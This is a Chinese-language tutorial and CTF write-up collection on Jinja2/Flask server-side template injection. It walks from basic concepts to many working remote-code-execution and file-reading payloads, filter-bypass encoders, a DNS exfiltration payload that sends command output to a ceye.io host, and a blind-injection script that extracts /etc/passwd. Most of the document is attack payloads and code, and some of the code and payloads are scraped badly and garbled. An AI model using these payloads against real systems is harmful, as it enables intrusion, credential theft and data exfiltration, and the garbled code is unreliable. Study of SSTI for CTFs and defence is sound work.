python中的ssti
前置知识
原理:服务器模板中拼接了恶意用户输入导致各种漏洞
flask的渲染方法:
render_template():渲染一个指定文件
1
return render_template('index.html')
render_template_string:渲染一个字符串
1
2html = '<h1>This is index page</h1>'
return render_template_string(html)
模板
flask使用jinja2作为渲染引擎
在网站的根目录下创建templates文件夹,这里用来存放html文件,也就是模板文件
test.py
1
2
3
4from flask import Flask,url_for,redirect,render_template,render_template_string
def user_login():
return render_template('index.html')/templates/index.html
1
<h1>This is index page</h1>
导致漏洞的例子
demo.py
1
2
3
4from flask import Flask,url_for,redirect,render_template,render_template_string
'/index/') .route(
def user_login():
return render_template('index.html',content='This is index page.')/templates/index.html
1
<h1>{{content}}</h1>
flask的全局变量
- current_app:代表当前flask程序实例
- g:作为flask程序全局的临时变量
- requests:客户端发送的HTTP请求内容
- session:用户会话
python自带的函数
- config:可以从模板中直接发让问flask当前的config都西昂
- request:flask中代表当前请求的request对象
- session:为flask的session对象
- url_for():该函数会根据传入的路由器函数名,返回该路由对应的url,在模板中始终是有url_for()就可以安全的修改路由绑定url
- get_flashed_messages():该函数会返回之前在flask中通过flask传入的消息的列表
python的魔术方法
- init:对象初始化方法
- class:返回对象所属的类
- module:返回类所在的模块
- mro:返回类的调用顺序,可以用来寻找父类
- base:获取类的直接父类
- dict:用于返回当前类的函数、属性、全局变量等
- subclasses:返回所有仍处于活动状态的引用的列表,列表按定义顺序排列(用来找子类)
- globals:获取函数所属空间下可使用的模块,方法以及变量(用来访问全局变量)
- import:用于导入模块、经常用于导入os模块
- builtins:返回python中的内置函数
ssti的利用思路:
- 寻找一个倒霉的内置类:[]、””等
- 通过这个类直接获取到object类:base、mro等
- 通过object类获取到所有子类:subclasses
- 在子列表中寻找可以利用的类
- 直接调用类下面函数或使用该类空间下可用的其他模块的函数
利用
获取配置文件
1
2
3# 获取配置信息
{{config}} # 能获取到config,它包含了如数据库链接字符串、连接到第三方的凭证、SECRET_KEY等敏感信息
{{request.environ}} # 服务器环境信息xss
存在xss漏洞的代码
1
2
3
4
5
6
7
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)这段diamond存在漏洞的原因是数据和代码的混淆,代码中的code是用户可控的,会和html进行拼接后直接带入渲染
rce
warnings.catch_warnings这个类虽然不存在os模块,单是warnings.catch_warnings类在内部定义了_moudle=sys.module[‘warnings’],然后warnings模块包含builtins,也就是说只要能找到warnings.catch_warnings这个类,就可以不用globals
_frozen_importlib_external.FileLoader的get_data()方法,第一个是参数0,第二个为要读取的文件名
subprocess
- popen:可以直接命令执行
- run:3.5中新增的函数。执行指定的之类
- call:执行指定的之类,返回命令执行状态,类似os.system(cmd)
- check_call:2.5新增的函数,执行指定的之类,如果执行成功则返回状态码,否则抛出异常
- check_output:2.7中新增的函数,执行指定的命令,如果执行状态码为0则返回命令执行的结果,否则抛出异常
- getoutput:接收字符串格式的命令,执行命令并且返回执行结果,功能类似os.popen
直接使用os(os._wrap_close)
linecache类所属空间下可用os模块进行rce
利用file类进行文件读取(但是该类在py3被删除了)
读取
1
2{{[].__class__.__base__.__subclasses__()[40]('etc/passwd').read()}}
{{[].__class__.__base__.__subclasses__()[40]('etc/passwd').readlines()}}写入
1
{{"".__class__.__bases[0]__.__bases__[0].__subclasses__()[40]('/tmp').write('test')}}
绕过
过滤点
使用[]绕过
1
{{()['__class__']['__base__']['__subclasses__']()[433]['__init__']['__globals__']['popen']('whoami')['read']()}}
使用attr绕过
1
{{()|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(65)|attr('__init__')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('eval')('__import__("os").popen("whoami").read()')}}
使用getattr绕过
过滤单引号和双引号
- request绕过
- chr绕过
过滤小括号
使用python内置函数:
get_flashed_messages()
1
{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
url_for()
1
{{url_for.__globals__['current_app'].config['FLAG']}}
过滤class、subclasses、read关键字
使用request:
GET:request.args
Cookies:request.cookies
Headers:request.headers
Environment:request.environ
Values:request.values
1
{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
拼接字符串
1
2
3'o'+'s'
'sy' + 'stem'
'fl' + 'ag'编码绕过
大小写绕过
过滤config
1
{{self.dict._TemplateReference__context.config}}
过滤下划线_
- 使用request
- 使用十六进制绕过
过滤中括号
getattribute
1
{{"".__getattribute__("__cla"+"ss__").__base__}}
getattribute结合request绕过
过滤双大括号
dns外带
1
{% if ().__class__.__base__.__subclasses__()[433].__init__.__globals__['popen']("curl `whoami`.k1o75b.ceye.io").read()=='kawhi' %}1{% endif %}
盲注(脚本)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18import requests
url = 'http://ip:5000/?name='
def check(payload):
r = requests.get(url+payload).content
return 'kawhi' in r
password = ''
s = r'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'
for i in xrange(0,100):
for c in s:
payload = '{% if ().__class__.__bases__[0].__subclasses__()[40].__init__.__globals__.__builtins__.open("/etc/passwd").read()['+str(i)+':'+str(i+1)+'] == "'+c+'" %}kawhi{% endif %}'
if check(payload):
password += c
break
print password
导入主函数读取变量
1
{%print request.application.__globals__.__getitem__('__builtins__').__getitem__('__import__')('__main__').flag %}
unicode绕过
全角字符绕过
脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44#unicode绕过
def string_to_unicode(input_string):
# 将每个字符转换为 Unicode 转义序列
unicode_string = ''.join(f'\\u{ord(char):04x}' for char in input_string)
print("Unicode转换的结果是:"+unicode_string)
#八进制绕过
def string_to_octal(input_string):
octal_string = "".join([f"\\{oct(ord(char))[2:]}" for char in input_string])
print("八进制转换的结果是:"+octal_string)
#16进制绕过
def sixteen_to_string(input_string):
sixteen_string = "".join([f"\\x{hex(ord(char))[2:]}" for char in input_string])
print("十六进制转换的结果是:"+sixteen_string)
#chr字符转换
def string_to_chr(input_string):
i=input_string
chr_string = ""
for c in i:
c = ord(c)
b = "chr(%d)" % (c)
chr_string += b + '%2b'
print(chr_string[0:-3:1])
#半角字符转换
def full_to_half(input_string):
n = []
for char in input_string:
# 全角空格转换为半角空格
if char == ' ':
char = ' '
# 全角字符(除空格)转换为半角字符
elif 33 <= ord(char) <= 126:
char = chr(ord(char) + 65248)
n.append(char)
print( "半角字符转换的结果是:"+''.join(n))
# 测试字符串
input_string = ""
# 转换为 Unicode 编码
unicode_encoded = string_to_unicode(input_string)
octal_encoded = string_to_octal(input_string)
sixteen_encoded =sixteen_to_string(input_string)
chr_encoded = string_to_chr(input_string)
har_encoded = full_to_half(input_string)
例题
0xGame(ez_ssti)-无参
源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18from flask import Flask, request
import subprocess
app = Flask(__name__)
def index():
return open(__file__).read()
def calculator():
expression = request.form.get('expression') or "114 1000 * 514 + p"
result = subprocess.run(["dc", "-e", expression], capture_output=True,text=True)
return result.stdout
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000)但是这里发现在url中存在ssti注入漏洞,注入点在404的处理函数,会将请求的url作为模板字符串渲染,而请求路径和参数对我们来说是可控的,并且我们需要获取环境变量里面的flag,这里我们需要利用sys模块,sys.modules中存储了所有模块的信息
payload
1
2{{x.__init__.__globals__['__builtins__'][']('sys')[import]('sys')[']
('sys').modules['__main__'].flag}}
极客大挑战(Can_you_Pass_Me)
基础ssti,payload
1
{'name': '{%print ((((joiner|attr(\'_\'\'_init__\')|attr(\'_\'\'_globals__\')|attr(\'__g\'\'etitem__\'))(\'_\'\'_builtins__\')).__import__(\'o\'\'s\')|attr(\'p\'\'open\'))("\\x63\\x61\\x74\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x65\\x6c\\x66\\x2f\\x65\\x6e\\x76\\x69\\x72\\x6f\\x6e")|attr(\'r\'\'ead\'))()%}'}
长城杯(CandyShop)–原型链污染配合ssti
源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174import datetime
from flask import Flask, render_template, render_template_string, request, redirect, url_for, session, make_response
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_wtf import FlaskForm
import re
app = Flask(__name__)
app.config['SECRET_KEY'] = 'xxxxxxx'
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
submit = SubmitField('Register')
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired(), Length(min=2, max=20)])
password = PasswordField('Password', validators=[DataRequired(), Length(min=6, max=20)])
submit = SubmitField('Login')
class Candy:
def __init__(self, name, image):
self.name = name
self.image = image
class User:
def __init__(self, username, password):
self.username = username
self.password = password
def verify_password(self, username, password):
return (self.username==username) & (self.password==password)
class Admin:
def __init__(self):
self.username = ""
self.identity = ""
def sanitize_inventory_sold(value):
return re.sub(r'[a-zA-Z_]', '', str(value))
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
candies = [Candy(name="Lollipop", image="images/candy1.jpg"),
Candy(name="Chocolate Bar", image="images/candy2.jpg"),
Candy(name="Gummy Bears", image="images/candy3.jpg")
]
users = []
admin_user = []
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(username=form.username.data, password=form.password.data)
users.append(user)
return redirect(url_for('login'))
return render_template('register.html', form=form)
def login():
form = LoginForm()
if form.validate_on_submit():
for u in users:
if u.verify_password(form.username.data, form.password.data):
session['username'] = form.username.data
session['identity'] = "guest"
return redirect(url_for('home'))
return render_template('login.html', form=form)
inventory = 500
sold = 0
def home():
global inventory, sold
message = None
username = session.get('username')
identity = session.get('identity')
if not username:
return redirect(url_for('register'))
if sold >= 10 and sold < 500:
sold = 0
inventory = 500
message = "But you have bought too many candies!"
return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)
if request.method == 'POST':
action = request.form.get('action')
if action == "buy_candy":
if inventory > 0:
inventory -= 3
sold += 3
if inventory == 0:
message = "All candies are sold out!"
if sold >= 500:
with open('secret.txt', 'r') as file:
message = file.read()
return render_template('home.html', inventory=inventory, sold=sold, message=message, candies=candies)
def admin():
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
admin = Admin()
merge(session,admin)
admin_user.append(admin)
return render_template('admin.html', view='index')
def view_candies():
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
return render_template('admin.html', view='candies', candies=candies)
def add_candy():
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
candy_name = request.form.get('name')
candy_image = request.form.get('image')
if candy_name and candy_image:
new_candy = Candy(name=candy_name, image=candy_image)
candies.append(new_candy)
return render_template('admin.html', view='add_candy')
def view_inventory():
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
inventory_value = sanitize_inventory_sold(inventory)
sold_value = sanitize_inventory_sold(sold)
return render_template_string("商店库存:" + inventory_value + "已售出" + sold_value)
def add_inventory():
global inventory
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
if request.form.get('add'):
num = request.form.get('add')
inventory += int(num)
return render_template('admin.html', view='add_inventory')
def index():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=1337)在admin路由下发现存在原型链污染
1
2
3
4
5
6
7
8
9
10
def admin():
username = session.get('username')
identity = session.get('identity')
if not username or identity != 'admin':
return redirect(url_for('register'))
admin = Admin()
merge(session,admin)
admin_user.append(admin)
return render_template('admin.html', view='index')但是原型链污染只能在admin成功登陆后才能触发,那么首先我们需要对session进行伪造,session伪造首先要获取到密钥,对session进行爆破得到密钥:a123456,接着伪造session后就可以进行原型链污染,但是在源码中存在过滤
1
2def sanitize_inventory_sold(value):
return re.sub(r'[a-zA-Z_]', '', str(value))过滤了字母以及下划线,使用八进制绕过,原始payload,转换成八进制就行
1
{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}
ciscn(proxy)–无回显ssti
源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107from flask import Flask, request, render_template_string
import socket
import threading
import html
app = Flask(__name__)
def source():
with open(__file__, 'r', encoding='utf-8') as f:
return '<pre>'+html.escape(f.read())+'</pre>'
def template():
template_code = request.form.get("code")
# 安全过滤
blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
for black in blacklist:
if black in template_code:
return "Forbidden content detected!"
result = render_template_string(template_code)
print(result)
return 'ok' if result is not None else 'error'
class HTTPProxyHandler:
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
def handle_request(self, client_socket):
try:
request_data = b""
while True:
chunk = client_socket.recv(4096)
request_data += chunk
if len(chunk) < 4096:
break
if not request_data:
client_socket.close()
return
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
proxy_socket.connect((self.target_host, self.target_port))
proxy_socket.sendall(request_data)
response_data = b""
while True:
chunk = proxy_socket.recv(4096)
if not chunk:
break
response_data += chunk
header_end = response_data.rfind(b"\r\n\r\n")
if header_end != -1:
body = response_data[header_end + 4:]
else:
body = response_data
response_body = body
response = b"HTTP/1.1 200 OK\r\n" \
b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
b"Content-Type: text/html; charset=utf-8\r\n" \
b"\r\n" + response_body
client_socket.sendall(response)
except Exception as e:
print(f"Proxy Error: {e}")
finally:
client_socket.close()
def start_proxy_server(host, port, target_host, target_port):
proxy_handler = HTTPProxyHandler(target_host, target_port)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(100)
print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")
try:
while True:
client_socket, addr = server_socket.accept()
print(f"Connection from {addr}")
thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
thread.daemon = True
thread.start()
except KeyboardInterrupt:
print("Shutting down proxy server...")
finally:
server_socket.close()
def run_flask_app():
app.run(debug=False, host='127.0.0.1', port=5000)
if __name__ == "__main__":
proxy_host = "0.0.0.0"
proxy_port = 5001
target_host = "127.0.0.1"
target_port = 5000
# 安全反代,防止针对响应头的攻击
proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
proxy_thread.daemon = True
proxy_thread.start()
print("Starting Flask app...")
run_flask_app()无回显不出网写入app.py